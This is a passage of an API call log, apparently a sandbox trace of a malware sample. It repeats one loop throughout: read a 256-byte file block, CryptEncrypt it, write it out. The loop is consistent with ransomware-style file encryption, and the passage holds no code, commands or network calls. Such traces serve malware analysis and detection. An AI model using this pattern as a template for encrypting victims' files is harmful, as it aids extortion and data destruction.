out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.298] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.298] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.298] GetLastError () returned 0x0 [0145.298] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.298] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.298] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.298] GetLastError () returned 0x0 [0145.298] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.298] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.298] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.298] GetLastError () returned 0x0 [0145.298] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.298] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.298] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.298] GetLastError () returned 0x0 [0145.298] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.298] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.298] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.298] GetLastError () returned 0x0 [0145.298] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.298] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.298] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.298] GetLastError () returned 0x0 [0145.298] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.298] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.299] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.299] GetLastError () returned 0x0 [0145.299] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.299] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.299] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.299] GetLastError () returned 0x0 [0145.299] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.299] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.299] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.299] GetLastError () returned 0x0 [0145.299] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.299] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.299] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.299] GetLastError () returned 0x0 [0145.299] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.299] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.299] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.299] GetLastError () returned 0x0 [0145.299] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.299] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.299] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.299] GetLastError () returned 0x0 [0145.299] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.299] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.299] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.300] GetLastError () returned 0x0 [0145.300] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.300] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.300] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.300] GetLastError () returned 0x0 [0145.300] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.300] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.300] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.300] GetLastError () returned 0x0 [0145.300] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.300] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.300] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.300] GetLastError () returned 0x0 [0145.300] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.300] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.300] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.300] GetLastError () returned 0x0 [0145.300] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.300] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.300] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.300] GetLastError () returned 0x0 [0145.300] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.300] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.300] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.301] GetLastError () returned 0x0 [0145.301] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.301] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.301] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.301] GetLastError () returned 0x0 [0145.301] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.301] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.301] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.301] GetLastError () returned 0x0 [0145.301] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.301] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.301] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.301] GetLastError () returned 0x0 [0145.301] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.301] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.301] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.301] GetLastError () returned 0x0 [0145.301] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.301] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.301] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.301] GetLastError () returned 0x0 [0145.301] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.301] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.301] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.301] GetLastError () returned 0x0 [0145.301] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.302] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.302] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.302] GetLastError () returned 0x0 [0145.302] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.302] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.302] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.302] GetLastError () returned 0x0 [0145.302] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.302] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.302] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.302] GetLastError () returned 0x0 [0145.302] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.302] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.302] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.302] GetLastError () returned 0x0 [0145.302] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.302] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.302] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.302] GetLastError () returned 0x0 [0145.302] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.302] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.302] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.302] GetLastError () returned 0x0 [0145.302] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.302] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.302] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.303] GetLastError () returned 0x0 [0145.303] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, 